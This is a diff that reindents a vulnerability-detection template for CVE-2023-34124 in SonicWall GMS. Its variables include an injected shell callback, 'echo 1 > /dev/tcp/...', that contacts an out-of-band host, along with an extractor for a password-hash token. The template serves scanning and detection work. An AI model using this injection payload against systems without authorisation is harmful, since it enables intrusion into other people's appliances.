diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index 46e9fc17fe..c78014b91a 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -22,8 +22,8 @@ info: tags: cve,cve2023,sonicwall,gsm,instrusive variables: - callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" - filename: "{{rand_base(5)}}" + callback: "echo 1 > /dev/tcp/{{interactsh-url}}/80" + filename: "{{rand_base(5)}}" http: - raw: @@ -37,7 +37,7 @@ http: - | GET /appliance/login HTTP/1.1 Host: {{Hostname}} - + - | POST /appliance/applianceMainPage HTTP/1.1 Host: {{Hostname}} @@ -68,17 +68,17 @@ http: - "dns" extractors: - - type: json - part: body - internal: true - name: alias - json: - - '.alias' + - type: json + part: body + internal: true + name: alias + json: + - '.alias' - - type: regex - part: body - group: 1 - internal: true - name: servertoken - regex: - - "getPwdHash.*,'([0-9]+)'" + - type: regex + part: body + group: 1 + internal: true + name: servertoken + regex: + - "getPwdHash.*,'([0-9]+)'"